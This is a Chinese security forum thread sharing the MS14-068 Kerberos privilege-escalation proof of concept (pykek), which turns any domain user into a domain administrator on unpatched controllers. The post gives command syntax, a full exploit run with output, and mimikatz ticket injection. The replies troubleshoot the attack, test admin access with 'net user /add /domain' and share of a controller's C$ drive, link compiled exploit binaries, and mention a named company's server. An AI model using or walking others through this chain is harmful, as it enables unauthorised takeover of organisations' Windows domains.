当前位置:WooYun(白帽子技术社区) >> windows域安全 >> MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

DM_ (http://x0day.me) | 2014-12-05 16:35

https://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

USAGE:

ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:
    -p <clearPassword>
--rc4 <ntlmHash>
Example usage :

Linux (tested with samba and MIT Kerberos)

root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file '[email protected]'... Done!
root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc [email protected]" exit`

分享到:
69 个回复
  1. 1#
    回复此人 感谢
    园长 (喵~) | 2014-12-05 16:41

    看到了

  2. 2#
    回复此人 感谢
    醉青丝 | 2014-12-05 16:43

    爱你

  3. 3#
    回复此人 感谢
    risi | 2014-12-05 16:43

    sid 怎么找呀 ... 话说都在域里了再拿 域管难度不大呀

  4. 4#
    回复此人 感谢
    DM_ (http://x0day.me) | 2014-12-05 16:44

    @risi
    这样不用抓明文,整理,再扫,抓明文。。。
    要是好方法,可以在这里交流啊。

  5. 5#
    回复此人 感谢
    DM_ (http://x0day.me) | 2014-12-05 16:45

    @risi

    域内不用扫,用查 【邪恶】

  6. 6#
    回复此人 感谢
    if、so | 2014-12-05 16:46

    问题是,这年头谁不打补丁

  7. 7#
    回复此人 感谢
    Mody | 2014-12-05 16:52

    瓦擦,出poc拉

  8. 8#
    回复此人 感谢
    risi | 2014-12-05 16:53

    @DM_ 恩。 找到方法了, geusid.exe
    你们测成功了?

  9. 9#
    回复此人 感谢
    s0mun5 | 2014-12-05 17:22

    @risi whoami /all

  10. 10#
    回复此人 感谢
    null (生活不会像你想象得那么好,也不会像你想象得那么糟。) | 2014-12-05 17:23

    wmic useraccount where name="USERNAME" get sid

  11. 11#
    回复此人 感谢
    Chu (学习ing。) | 2014-12-05 17:24

    mark

  12. 12#
    回复此人 感谢
    null (生活不会像你想象得那么好,也不会像你想象得那么糟。) | 2014-12-05 17:24

    @if、so 这年头,服务器打补丁的少,除了那种IT为导向的企业。

  13. 13#
    回复此人 感谢
    刘海哥 (‮moc.ghuil.www) | 2014-12-05 19:35

    mark!

  14. 14#
    回复此人 感谢
    x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) | 2014-12-05 19:36

    mark

  15. 15#
    回复此人 感谢
    RainShine (I'm your angel of music.) | 2014-12-05 19:42

    MARK!

  16. 16#
    回复此人 感谢
    _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2014-12-05 19:52

    mark!

  17. 17#
    回复此人 感谢
    GuoKer(ZhuLiu) (基友们,一起钻研吧) | 2014-12-05 19:53

    mark!

  18. 18#
    回复此人 感谢
    二狗子 (农村非主流) | 2014-12-05 20:05

    内网杀手啊

  19. 19#
    回复此人 感谢
    Jumbo (www.chinabaiker.com) | 2014-12-05 20:15

    那个512,513啥意思

  20. 20#
    回复此人 感谢
    netwind | 2014-12-05 20:44

    mark

  21. 21#
    回复此人 感谢
    孤月寒城 (握了棵草) | 2014-12-05 20:57

    我擦。好猛

  22. 22#
    回复此人 感谢
    帕秋莉 (私は眠りたい wwwww) | 2014-12-05 22:54

    卧槽。 小马哥威武

  23. 23#
    回复此人 感谢
    Cyrils | 2014-12-05 23:28

    感谢马总!

  24. 24#
    回复此人 感谢
    _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2014-12-05 23:29

    kerberos::ptc 咪咪卡住提示没有啊。

  25. 25#
    回复此人 感谢
    Kuuki | 2014-12-05 23:30

    wow

  26. 26# 感谢(1)
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-05 23:52

    测试成功,自己编译的exe版本···mimikatz要去官网下最新的,才有ptc模块···

  27. 27#
    回复此人 感谢
    _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2014-12-06 00:13

    @Major 感谢。

  28. 28#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 00:18

    @_Thorns 你这感谢的方式不对啊···点我右上角感谢啊

  29. 29#
    回复此人 感谢
    _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2014-12-06 00:33

    @Major 已点。

  30. 30#
    回复此人 感谢
    luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2014-12-06 08:09

  31. 31#
    回复此人 感谢
    s0mun5 | 2014-12-06 09:13

    @Major cache文件解出来是什么内容?求截图

  32. 32#
    回复此人 感谢
    magerx (为什么要去争论。) | 2014-12-06 10:15

    这个牛。

  33. 33#
    回复此人 感谢
    My5t3ry | 2014-12-06 11:24

    mark

  34. 34#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 11:28

    @s0mun5 这个文件不是用来解的··是用来inject的,mimikatz新版有一个ptc模块可以inject kerberos tickets,成功后会显示inject ok!会把当前普通用户加入到域管组,然后利用该session去连接域控···你可以理解成hash注射,但是跟hash注射不一样(友情提示:感谢按钮在右上角)

  35. 35#
    回复此人 感谢
    屎蛋 | 2014-12-06 11:42

    卡在password不动了,啥也没列出来 蛋疼

  36. 36#
    回复此人 感谢
    屎蛋 | 2014-12-06 12:15

    @Major 卡着不动 姿势有问题? Capture.PNG

  37. 37#
    回复此人 感谢
    ramos | 2014-12-06 13:20

    @屎蛋 是不是要输入jack对应的密码?还是可以直接使用 -p参数设置密码?

  38. 38#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 13:22

    @ramos 要输密码···有-p参数吗??

  39. 39#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 13:22

    @屎蛋 要输密码···jack密码

  40. 40#
    回复此人 感谢
    m00zh33 | 2014-12-06 15:19

    jinecting ticket: OK之后,net user m00zh33 /add /domain 直接报 System error 5 has occurred. Access is denied. 因为之前尝试了几次,为什么是access is denied????难道没有成功????@Major

  41. 41#
    回复此人 感谢
    ramos | 2014-12-06 15:25

    @m00zh33 domain admins组内有你吗?

  42. 42#
    回复此人 感谢
    m00zh33 | 2014-12-06 15:29

    @ramos,没有,我只控制了一个domain user

  43. 43#
    回复此人 感谢
    jk_影 | 2014-12-06 15:36

    mimikatz一直注入失败

  44. 44#
    回复此人 感谢
    jk_影 | 2014-12-06 15:40

    -s <userSid> 这个是域管理的sid还是当前用户的呢?

  45. 45#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 15:40

    @m00zh33 你直接dir \\dc\c$  或者直接dir其他机器C$共享 用at试试··

  46. 46#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 15:40

    @ramos 成功之后Domain Admins组和其他管理员组没有你当前用户···

  47. 47#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 15:41

    @jk_影 我在win7下成功,在XP下失败

  48. 48#
    回复此人 感谢
    jk_影 | 2014-12-06 15:49

    @Major -s <userSid> 这个是当前用户的sid还是域管理的id 03测试能生成[email protected]这个文件 但是mimikatz ptc模块inject 一直error

  49. 49#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 15:56

    @jk_影 你当前用户的sid啊···

  50. 50#
    回复此人 感谢
    jk_影 | 2014-12-06 16:06

    @Major 你成功提权到域管了吗?

  51. 51#
    回复此人 感谢
    Major (荣誉:核心白帽子) | 2014-12-06 16:20

    @jk_影 嗯啊···

  52. 52#
    回复此人 感谢
    jk_影 | 2014-12-06 16:24

    @Major 新版本的mimikatz可以发一个出来吗我一直是在注入失败

  53. 53#
    回复此人 感谢
    dmst | 2014-12-06 18:11

    mark!!!

  54. 54#
    回复此人 感谢
    0xTback | 2014-12-07 01:46

    mark

  55. 55#
    回复此人 感谢
    m00zh33 | 2014-12-07 13:39

    @Major dir \\dc\c$ 报Access is denied,其他域内机器也都是一样的access is denied。客户端是win7,域控可能是2008的。inject 都是ok的。

  56. 56#
    回复此人 感谢
    jk_影 | 2014-12-07 18:43

    @m00zh33 我昨天测试也是这样感觉还有什么东西没弄

  57. 57#
    回复此人 感谢
    GuoKer(ZhuLiu) (基友们,一起钻研吧) | 2014-12-07 19:02

    @Major 2003和xp测试不成功吗?

  58. 58#
    回复此人 感谢
    l137 (有些事情不是你不去看,它就没了的) | 2014-12-08 09:53

    我出了个pyasn1.error.PyAsn1Error: TagSet的错误

  59. 59#
    回复此人 感谢
    灰色轨迹 | 2014-12-08 13:21

    @Major 如何测试成功的

  60. 60#
    回复此人 感谢
    带我玩 | 2014-12-08 13:53

    表示没玩懂

  61. 61#
    回复此人 感谢
    灰色轨迹 | 2014-12-08 16:08

    @Major inject 都是ok的。 结果
    dir \\dc\c$ 报Access is denied  都同样 换别的机器也是一样 求原因 求解决方案

  62. 62#
    回复此人 感谢
    m00zh33 | 2014-12-08 17:01

    @灰色轨迹,遇到一样的问题,客户端是win7,域控可能是server2008的

  63. 63#
    回复此人 感谢
    beastk | 2014-12-08 17:42

    File "kek\krb5.pyc"
    有没有出现过这个问题

  64. 64#
    回复此人 感谢
    jk_影 | 2014-12-09 11:40

    @m00zh33 土司有人说要用本地账户登录 然后在注入 不要用域内普通账户

  65. 65#
    回复此人 感谢
    beastk | 2014-12-09 14:57

    @jk_影 ?本地账户?
    有些环境本地帐户是无法访问到域内资源的

  66. 66#
    回复此人 感谢
    jk_影 | 2014-12-09 15:11

    @beastk 我测试过了只要机器加入域内 用本地administrator 可以成功 关键在于session
    这个说的很清楚了http://www.secpulse.com/archives/2874.html

  67. 67#
    回复此人 感谢
    nony (Not do is die...) | 2014-12-12 21:30

    EXE版本点击此处下载:ms14-068.exe


    py版本下载:MS14-068.py

  68. 68#
    回复此人 感谢
    Lee Swagger (one) | 2014-12-15 00:12

    Sony的域服务器

  69. 69#
    回复此人 感谢
    V-King (解决问题必有感谢,别问我是不是土豪(穷diao一个) | 2014-12-19 21:25

    socket.error: [Errno 10061]  提示这个   百度了下好像是远程拒绝   但是不知道怎么解决

  70. 70#
    回复此人 感谢
    hack2012 (www.waitalone.cn) | 2015-10-21 13:58

    win7 client+domain 2008 没有测试成功,为何?

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容

  • 暂无

Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1